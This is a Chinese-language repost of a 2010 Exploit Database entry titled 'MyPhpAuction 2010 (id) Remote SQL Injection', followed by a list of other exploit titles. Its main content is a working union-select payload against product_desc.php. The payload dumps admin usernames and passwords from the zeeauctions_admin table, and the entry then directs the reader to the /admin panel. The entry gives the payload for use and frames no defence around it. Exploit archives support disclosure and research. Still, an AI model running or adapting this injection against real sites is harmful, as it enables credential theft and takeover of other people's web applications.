MyPhpAuction 2010 – ‘id’ SQL Injection

Exploit Database
31 阅读

作者： h4ck3r

日期： 2010-09-29
类别：
- webapps
平台：
- php
来源：https://www.exploit-db.com/exploits/15154/

==
# Title: MyPhpAuction 2010 (id) Remote SQL Injection Vuln
# Version: 2010
# Link: http://galaxyscriptz.com/products/MyPhpAuction-2010.html
==
# Author: BorN To K!LL - h4ck3r
# Contact: SQL@hotmail.co.uk
==
# 3xploit:
/product_desc.php?id=-5+union+all+select+1,2,concat(admin_name,0x3a,pwd),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35+from+zeeauctions_admin--

then get username & password n then go to the admin panel ,,

# Admin Panel:
/admin


# Greetings:
Dr.2 , Inject0r's Community , AsbMay's Group , darkc0de team , and all ma friends ,,
==

last Exploits
MyPhpAuction 2010 – ‘id’ SQL Injection的更多信息

Hiverr 2.2 – Multiple Vulnerabilities：
Joomla! Component com_comp – SQL Injection：
WordPress Plugin miniBB – SQL Injection / Multiple Cross-Site Scripting Vulnerabilities：
FiberHome – Directory Traversal：
Moeditor 0.2.0 – Persistent Cross-Site Scripting：
WordPress Plugin Pretty Link 1.5.2 – ‘pretty-bar.php’ Cross-Site Scripting：
Hotel Booking Script 3.4 – Cross-Site Request Forgery (Change Admin Password)：
WordPress Theme Area53 – Arbitrary File Upload：